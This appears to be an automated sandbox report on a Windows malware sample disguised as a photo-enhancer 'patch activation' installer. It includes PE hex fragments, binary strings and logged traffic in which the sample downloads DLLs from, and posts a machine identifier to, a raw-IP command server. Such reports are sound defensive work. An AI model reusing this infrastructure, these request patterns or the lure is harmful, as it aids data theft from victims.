00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:23 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.innosetup.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.palkornel.hu/innosetup
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.palkornel.hu/innosetup%1
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.remobjects.com/psU
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: https://mozilla.org0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/&
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/.
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/2
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 51.195.166.178Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6

System Summary
barindex
PE file contains section with special chars
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .a|D
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .=xC
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004088C0 21_2_004088C0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00490830 22_2_00490830
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004688B8 22_2_004688B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00482CD8 22_2_00482CD8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00472090 22_2_00472090
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00452194 22_2_00452194
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0043E240 22_2_0043E240
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0043083C 22_2_0043083C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0046A974 22_2_0046A974
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004449B8 22_2_004449B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00434AB4 22_2_00434AB4
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00444F60 22_2_00444F60
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0048908C 22_2_0048908C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004313C8 22_2_004313C8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00445658 22_2_00445658
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004357B8 22_2_004357B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0045F954 22_2_0045F954
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00445A64 22_2_00445A64
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0045BA04 22_2_0045BA04
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00489FEC 22_2_00489FEC
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.16.dr Static PE information: Number of sections : 18 > 10
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 21_2_00409920
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 22_2_00455E14
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00453B40 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 0040909C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 0040596C appears 114 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004587AC appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00403400 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004585A0 appears 124 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00406F54 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00403494 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00446594 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 0040357C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004462C4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004349CC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00403684 appears 233 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00407D84 appears 43 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00424014 NtdllDefWindowProc_A, 22_2_00424014
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00412A68 NtdllDefWindowProc_A, 22_2_00412A68
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0047AC34 NtdllDefWindowProc_A, 22_2_0047AC34
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042FA00 NtdllDefWindowProc_A, 22_2_0042FA00
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00457E24 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 22_2_00457E24
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042EDC4: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 22_2_0042EDC4
PE file contains executable resources (Code or Archives)
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
PE file does not import any functions
Source: KbqArOlW06.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
